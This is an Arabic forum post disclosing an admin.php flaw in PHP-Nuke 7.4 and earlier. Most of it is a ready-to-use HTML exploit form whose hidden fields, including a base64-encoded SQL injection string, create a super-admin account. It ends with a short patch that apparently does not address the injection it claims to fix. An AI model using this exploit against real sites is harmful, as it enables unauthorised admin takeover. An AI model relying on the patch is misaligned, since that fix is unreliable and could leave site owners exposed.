منتدى الشبكة الكويتية - ثغرة النيوك , مع سد الثغرة ...

ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته

الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

كود:

NOME: 

    <input type="text" 

name="add_name"> 

    <br> 

    PASSWORD: 



    <input type="text" 

name="add_pwd"> 

    <br> 

    E-MAIL: 

    <input type="text" 

name="add_email"> 

    <br> 

    <input type="hidden" 

name="admin" 

value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 

    <br> 

    <input type="hidden" 

name="add_radminsuper" value="1"> 

    <br> 

    <input type="hidden" 

name="op" 

value="AddAuthor"> 

  </p> 

  <p> 

    <input type="submit" 

name="Submit" 

value="Create 

Admin"> 

    <br> 

  </p> 

</form>

الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:

if ( !empty($HTTP_GET_VARS['op']) ) 

{ 

$op = $HTTP_GET_VARS['op']; 

} 



if ( !empty($HTTP_POST_VARS['op']) ) 

{ 

$op = $HTTP_POST_VARS['op']; 

}

مع التحية اخواني اصحاب المواقع